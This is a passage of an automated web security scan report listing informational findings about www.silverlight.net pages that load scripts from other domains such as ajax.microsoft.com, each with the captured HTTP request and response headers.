   Dynamic La
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- (non-escaped version of what's above) -->
<script type="text/javascript" src="http://gestalt.ironpython.net/dlr-latest.js"></script>
...[SNIP]...

23.618. http://www.silverlight.net/learn/handsonlabs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/handsonlabs/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/handsonlabs/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 121077
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Hands On L
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.619. http://www.silverlight.net/learn/international/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/international/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/international/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25404
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Internatio
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.620. http://www.silverlight.net/learn/pivotviewer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/pivotviewer/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /learn/pivotviewer/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26847
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   PivotViewe
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>

<script src="http://www.microsoft.com/silverlight/scripts/Silverlight.js" type="text/javascript"></script>
...[SNIP]...

23.621. http://www.silverlight.net/learn/quickstarts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/quickstarts/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/quickstarts/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45478
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Quickstart
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.622. http://www.silverlight.net/learn/tutorials/jesse-liberty/general-tutorials/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/tutorials/jesse-liberty/general-tutorials/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/tutorials/jesse-liberty/general-tutorials/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21647
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Jesse Libe
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.623. http://www.silverlight.net/learn/tutorials/silverlight-4/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/tutorials/silverlight-4/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/tutorials/silverlight-4/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26523
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Tutorials
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.624. http://www.silverlight.net/learn/tutorials/silverlight-4/advanced-silverlight-out-of-browser-introduction/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/tutorials/silverlight-4/advanced-silverlight-out-of-browser-introduction/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/tutorials/silverlight-4/advanced-silverlight-out-of-browser-introduction/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61155
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Tutorial :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.625. http://www.silverlight.net/learn/tutorials/silverlight-4/aspnet-and-silverlight/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/tutorials/silverlight-4/aspnet-and-silverlight/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/tutorials/silverlight-4/aspnet-and-silverlight/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56561
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Tutorial :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.626. http://www.silverlight.net/learn/tutorials/silverlight-4/using-the-mvvm-pattern-in-silverlight-applications/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/tutorials/silverlight-4/using-the-mvvm-pattern-in-silverlight-applications/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/tutorials/silverlight-4/using-the-mvvm-pattern-in-silverlight-applications/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49515
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Tutorial :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.627. http://www.silverlight.net/learn/tutorials/silverlight-4/using-wcf-ria-services/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/tutorials/silverlight-4/using-wcf-ria-services/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/tutorials/silverlight-4/using-wcf-ria-services/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51246
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Tutorial :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.628. http://www.silverlight.net/learn/tutorials/windows-phone/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/tutorials/windows-phone/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/tutorials/windows-phone/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15039
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Tutorials
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.629. http://www.silverlight.net/learn/videos/all/build-your-first-desktop-ria-application-with-silverlight/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/all/build-your-first-desktop-ria-application-with-silverlight/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/all/build-your-first-desktop-ria-application-with-silverlight/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30323
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:33:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Video : Bu
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.630. http://www.silverlight.net/learn/videos/all/build-your-first-silverlight-web-application/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/all/build-your-first-silverlight-web-application/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/all/build-your-first-silverlight-web-application/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30378
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:33:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Video : Bu
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.631. http://www.silverlight.net/learn/videos/expression/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/expression/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/expression/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 105930
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:35:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.632. http://www.silverlight.net/learn/videos/indonesian-videos/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/indonesian-videos/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/indonesian-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26451
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:36:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.633. http://www.silverlight.net/learn/videos/japanese-videos/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/japanese-videos/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/japanese-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40504
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:36:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.634. http://www.silverlight.net/learn/videos/lyndacom-silverlight-essential-training/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/lyndacom-silverlight-essential-training/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/lyndacom-silverlight-essential-training/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 108581
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.635. http://www.silverlight.net/learn/videos/silverlight-4-videos/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/silverlight-4-videos/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/silverlight-4-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68787
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.636. http://www.silverlight.net/learn/videos/silverlight-media-framework/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/silverlight-media-framework/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/silverlight-media-framework/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35058
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:34:07 GMT
Connection: close


